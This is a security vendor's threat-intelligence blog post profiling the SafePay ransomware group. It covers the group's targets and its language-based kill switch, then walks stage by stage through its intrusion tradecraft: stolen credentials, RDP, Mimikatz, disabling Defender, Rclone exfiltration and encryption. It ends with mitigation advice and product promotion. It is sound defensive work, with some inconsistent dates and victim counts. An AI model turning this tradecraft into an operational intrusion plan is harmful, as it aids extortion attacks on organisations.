Dark Web Profile of the SafePay Ransomware
Gustavo Sánchez 08/01/2025 Cybersecurity, malware
8 Minutos

SafePay is a ransomware group that first emerged around September 2024. Its mode of operation is quite straightforward (and dangerous): it encrypts victims' files and demands payment in cryptocurrency to restore access. But that’s not all. It also steals sensitive information and threatens to publish it on the dark web if the ransom isn’t paid—a tactic known as double extortion, which has become increasingly common in these types of attacks.

Unlike many other ransomware groups that use the Ransomware-as-a-Service (RaaS) model—where external affiliates distribute the malware in exchange for a commission—SafePay appears to operate independently. In other words, the same team behind the ransomware is responsible for designing, deploying, and executing the attacks without intermediaries. This suggests a more controlled and organized approach, likely intended to maintain full control over victims and profits.

 

safepay-dls

SafePay Ransomware Data Leak Site (DLS)

 

Who Is Behind SafePay Ransomware?

 

SafePay burst onto the ransomware scene in early 2025—and it made quite an entrance. Until recently, it was a virtually unknown name, but within a matter of months, it became one of the most aggressive and active groups around. Their attacks have rapidly multiplied, and according to the group itself, they’ve already claimed responsibility for over 265 victims across multiple countries.

Interestingly, in 2024 they had only attacked about 20 organizations. But in 2025, their activity surged alarmingly, showing they are evolving quickly and have both the resources—and the intent—to scale their operations globally.

If there were still any doubts about the level of threat they pose, they recently took things up a notch: SafePay issued a serious warning to Ingram Micro, one of the world’s largest technology distributors. The group claims to have stolen 3.5 terabytes of confidential data during a cyberattack that occurred early last month. They are now threatening to leak all that sensitive information unless the company complies with their demands.

Moves like this show that SafePay isn’t just after money—they’re also aiming to create media pressure and public impact. Without a doubt, they are positioning themselves as a threat that goes beyond opportunistic attacks, with a much more calculated and damaging strategy.

 

Who Does SafePay Ransomware Target?

 

Since its emergence, SafePay has attacked over 250 organizations worldwide—and there are no signs of them slowing down. Their targets span various regions and industries, but the focus is clear: developed economies and critical sectors.

 

Top Affected Countries

 

The most heavily hit country by SafePay’s attacks is by far the United States, with at least 103 confirmed victims, accounting for nearly 40% of the known total. Germany follows with 47 cases, then others like the United Kingdom, Australia, Canada, and several nations in Latin America and Asia.

This geographical pattern clearly shows that SafePay is primarily targeting North America and Western Europe, where organizations tend to have more resources—and therefore, more to lose.

 

safeboy-targeted-countries

Top 10 countries targeted by SafePay Ransomware (Source: SOCRadar)

 

A particularly concerning fact is that Mexico ranks among the top 10 countries most targeted by this ransomware. This highlights an alarming trend: cybercriminals are no longer focusing exclusively on global powers, but are also turning their attention to emerging economies with increasingly active digital infrastructures—and, in many cases, uneven levels of cybersecurity. This makes Mexico an attractive target for this type of threat.

 

Read more: Ransomware in Mexico: Cyberattacks Cause Major IT Sector Losses

 

What Types of Industries Does SafePay Target?

 

Interestingly, SafePay doesn’t limit itself to a single sector. It has impacted a wide range of industries, with a clear focus on those that handle large volumes of data, critical infrastructure, or essential services. The most targeted sectors include:

 

  1. Manufacturing

  2. Technology

  3. Education

  4. Healthcare

  5. Business Services

 

In addition, companies in transportation and logistics, finance, agriculture, utilities, and even consumer services have also been affected.

This diversity suggests that SafePay isn’t aiming at a specific vertical, but rather at organizations likely to feel pressured into paying quickly to avoid serious disruptions or data leaks.

 

Who Doesn’t SafePay Ransomware Attack?

 

One revealing aspect is that SafePay intentionally avoids certain countries—especially those in the Commonwealth of Independent States (CIS), such as Russia, Ukraine, Belarus, and other former Soviet republics.

How do they do it? The malware includes a feature that checks the system’s language before executing. If it detects that the operating system is set to one of the following languages, it shuts down without causing harm:

 

  1. Armenian

  2. Azerbaijani (Cyrillic)

  3. Belarusian

  4. Georgian

  5. Kazakh

  6. Russian

  7. Ukrainian

 

This behavior, quite common among ransomware originating from Russia or former Soviet states, suggests that SafePay may have ties to those regions—or at least aims to avoid local conflicts or retaliation.

 

How Does SafePay Ransomware Attack? Tactics, Techniques, and What You Need to Know

 

The group behind SafePay Ransomware doesn’t improvise. Their attacks are well-planned, combining traditional tactics with advanced techniques to infiltrate systems, move through networks, steal information, and ultimately encrypt files.

While many of their strategies are shared with other ransomware groups, SafePay has certain traits that make it harder to detect and stop. Here's a clear yet technically detailed breakdown of how SafePay operates, step by step:

 

Initial Access: How SafePay Gets into Networks

 

SafePay typically conducts prior reconnaissance, identifying vulnerabilities and gathering valid access credentials.

 

  1. They often purchase stolen credentials on dark web markets or harvest them using infostealer malware.

  2. These credentials are used to access exposed services such as unprotected VPN portals or poorly configured RDP connections.

  3. They also exploit known vulnerabilities in unpatched software or devices.

 

A growing tactic involves phishing combined with vishing. They send malicious emails posing as tech support, and if there’s no response, they may follow up with phone calls to convince users to open a file or grant remote access. In some cases, they’ve even used platforms like Microsoft Teams for real-time interaction.

 

Attack Execution: Scripts, Native Tools, and Stealth

 

Once inside, SafePay’s team moves quickly, deploying scripts and payloads to gain control of the infected environment. They use:

 

  1. PowerShell scripts or .bat files to automate attack infrastructure.

  2. Native system tools like cmd.exe or regsvr32 to avoid detection (a method known as Living off the Land).

  3. Malicious DLLs disguised as legitimate Windows processes.

 

The ransomware itself is modular and configurable, allowing them to tailor each attack: deciding which folders to encrypt, what to exclude, or even self-destructing after execution.

 

Persistence: How They Maintain Access

 

SafePay ensures long-term access by:

 

  1. Installing legitimate remote-control tools like ConnectWise ScreenConnect, which can go unnoticed if installed with valid credentials.

  2. In some attacks, they've used custom malware such as QDoor, a lightweight remote access tool that allows hidden command execution or tunneling.

  3. Modifying Windows Registry entries to ensure their processes start automatically upon reboot.

 

Privilege Escalation: From Regular Users to Admins

 

To fully control the system, SafePay seeks elevated privileges:

 

  1. They use tools like Mimikatz to extract passwords and hashes directly from system memory.

  2. They exploit common bad practices like password reuse, weak policies, or admin accounts lacking multi-factor authentication.

  3. They’ve also bypassed UAC (User Account Control) prompts to silently gain administrative rights.

 

Defense Evasion: Dodging Antivirus and Detection

 

SafePay puts significant effort into evading security tools:

 

  1. They disable Microsoft Defender and other antivirus software via administrative commands or Group Policy modifications.

  2. They add exclusions to specific folders and remove security software when they have sufficient privileges.

  3. They use techniques like dynamic loading, obfuscation, string encryption, and geofencing to avoid detection.

 

Credential Access: Stealing to Expand Control

 

Throughout the attack, SafePay continues collecting credentials to increase their control:

 

  1. In addition to Mimikatz, they search for saved credentials in browsers, RDP clients, or management software.

  2. These stolen credentials are then used to disable defenses, access more systems, and prepare for the final encryption phase.

 

Lateral Movement: Silent Expansion Across the Network

 

Once they have privileged access, the attackers spread laterally through the network stealthily:

 

  1. They connect to other systems using RDP, shared folders, or remote commands.

  2. Tools like ShareFinder help them discover important servers, shared drives, or critical assets worth encrypting.

  3. They continue using PowerShell, batch scripts, and native Windows tools to stay under the radar.

This lateral movement allows them to take control of key infrastructure, such as backup servers or virtualization systems, before launching the main attack.

 

Data Exfiltration: Silent Theft Before the Disaster

 

SafePay doesn’t just encrypt files—it also steals large amounts of sensitive data. In fact, they often spend several days navigating the network and copying information:

 

  1. They locate critical files such as databases, financial documents, and legal records.

  2. These files are compressed using tools like WinRAR and transferred using FileZilla or Rclone to servers under their control.

  3. Often, they exfiltrate hundreds of gigabytes without being detected, as these tools effectively disguise outbound traffic.

 

The stolen data is then used in the second phase of the attack: extortion

 

safepay-cyber-kill-chain

Simplified Attack Chain Diagram of SafePay Ransomware

 

Final Impact: Encryption, Ransom Note, and Public Threat

 

When everything is set, SafePay launches the final phase:

 

  1. They encrypt files and change their extensions to .safepay.

  2. A ransom note (typically named readme_safepay.txt) is left on the system, providing instructions to contact the group via a portal hosted on the dark web—usually on The Open Network (TON).

  3. They threaten to publish the stolen data if the ransom is not paid.

 

Additionally, their leak site—known as the DLS (Data Leak Site)—is regularly updated with information about victims who refused to pay, increasing the pressure on targeted companies.

safepay-ransom-note

SafePay Ransomware Ransom Note

 

Read more: Loki Locker Ransomware: What It Is and How to Protect Yourself

 

How to Protect Against SafePay Ransomware: Effective Mitigation Tactics

 

Facing a threat like SafePay Ransomware is no easy task. This group is sophisticated, stealthy, and persistent. That’s why protecting your company requires a layered approach—one that combines technology, best practices, and user awareness.

There’s no silver bullet, but there are concrete measures that can drastically reduce the risk of an attack and minimize the impact if one occurs.

Here’s what you can do to defend against SafePay—and how solutions from TecnetOne can help you stay one step ahead.

 

Strengthen Access: The Basics, Done Right

 

One of SafePay’s favorite entry points is unsecured remote access. Securing your access points is the logical first step:

 

  1. Use strong, unique passwords for all accounts, especially admin accounts.

  2. Enable multi-factor authentication (MFA) for everything—VPN, RDP, admin panels, etc.

  3. Restrict remote access to essentials only. If it’s not absolutely necessary, disable it.

  4. Conduct regular audits and remove unused accounts.

 

At TecnetOne, we help implement secure access policies and monitor user behavior in real time through our SOC as a Service (Security Operations Center), which acts as an active barrier against unauthorized access.

 

Patching and Hardening Systems

 

Many SafePay attacks exploit known vulnerabilities—most of which already have patches, but are often overlooked due to lack of time or resources.

 

  1. Keep your VPNs, firewalls, servers, and public-facing software updated.

  2. Disable unused services like RDP if they aren’t absolutely necessary.

 

Monitor Credentials and Suspicious Behavior

 

SafePay thrives on stealing valid credentials. Early detection of misuse can stop the spread:

 

  1. Use EDR tools to detect suspicious activities, such as Mimikatz execution or access to LSASS.

  2. Watch for unusual logins—like valid credentials being used from unfamiliar IPs or geographic locations.

  3. Monitor for lateral movement signals, such as administrative share access or mass remote executions.

 

TecnetOne’s SOC monitors these behavioral patterns 24/7, helping detect attacks in their early stages before they escalate.

 

Control Use of Vulnerable Tools

 

Many of the tools SafePay uses come pre-installed with Windows. It’s important to manage their use:

 

  1. Limit or block access to tools like PowerShell, regsvr32, cmd.exe, etc.

  2. Set alerts for the execution of batch scripts or uncommon tools.

  3. Monitor the use of remote management software like ScreenConnect. Unauthorized installations should immediately trigger alerts.

 

Be Prepared to Detect Typical Ransomware Behavior

 

Ransomware attacks leave signals—if you know where to look. Some preventive steps:

 

  1. Disable Windows Script Host if it’s not needed.

  2. Use Group Policy to block the creation of files with suspicious extensions like .safepay.

  3. Detect sudden file changes, WinRAR usage, or unusual transfers via Rclone or FileZilla.

 

Secure Backups and Fast Recovery

 

Having backups is essential—but not just any backup will do.

 

  1. Perform regular, automated, offline backups.

  2. Isolate your backup infrastructure from the rest of the network to prevent encryption by ransomware.

  3. Ensure backups cannot be deleted or tampered with by attackers.

  4. Test your recovery process regularly to ensure full and fast restoration.

 

This is where  TecnetProtect Backup comes in—our solution built on Acronis technology, one of the world’s most robust data protection platforms.

With TecnetProtect, you get automated, encrypted, and isolated backups, and you can restore entire systems in minutes—without losing critical data.

 

User Training and Response Preparedness

 

Humans remain the “weakest link,” but they can also become your first line of defense.

 

  1. Train your team to recognize phishing emails, vishing calls, and suspicious messages in corporate chats.

  2. Conduct regular simulations—send fake phishing emails and measure who takes the bait.

  3. Establish and communicate a clear incident response plan. Everyone should know what to do if something goes wrong: isolate machines, contact IT, avoid interacting with attackers, etc.

 

Conclusion

 

Protecting against SafePay ransomware isn’t about luck—it’s about preparation. With a layered approach that includes strong technical controls, reliable backups, continuous monitoring, and ongoing education, you can drastically reduce your risk and be ready to respond if something happens.

And if you don’t have a strong internal cybersecurity team, don’t worry—TecnetOne offers comprehensive, managed solutions that support you every step of the way, from prevention to rapid incident response.

Want to assess if your company is ready to face a threat like SafePay?

 

Contact us

Tag:

Cybersecurity malware

Hacker AKA_Astaroth Exposes Official Data from Colima and More

Artículo Anterior

The Key to Success Is Consistency: Sophos Endpoint Earns AAA Rating

Siguiente Artículo
  • There are no suggestions because the search field is empty.

Categories

Most read articles

Adrian León 05/30/2025 Cybersecurity, cyberattack
Top 10 Dark Web Markets
Alexander Chapellin 04/30/2025 Cybersecurity, cyberattack
Top 10 Telegram Groups and Channels on the Dark Web
Alexander Chapellin 04/30/2025 Cybersecurity, cyberattack
Top 10 Browsers for Accessing the Dark Web with Anonymity
Jonathan Montoya 05/22/2025 Cybersecurity, cyberattack
Top 10 Deep Web and Dark Web Forums

Artículos Relacionados

Cybersecurity, cyberattack, malware, EDR
Alexander Chapellin 08/07/2025

New EDR Killer Tool Used by Eight Ransomware Groups

A new tool designed to disable Endpoint Detection and Response (EDR) solutions is making waves in

Leer más
Cybersecurity, cyberattack, malware
Scarlet Mendoza 08/06/2025

Akira Ransomware Uses CPU Tool to Disable Microsoft Defender

Akira ransomware has found a new way to bypass Windows defenses: it’s using a legitimate Intel

Leer más
cyberattack, malware
Levi Yoris 08/04/2025

New Malware Plague Targets Linux Devices

A new Linux malware that went undetected for over a year is now making waves in the cybersecurity

Leer más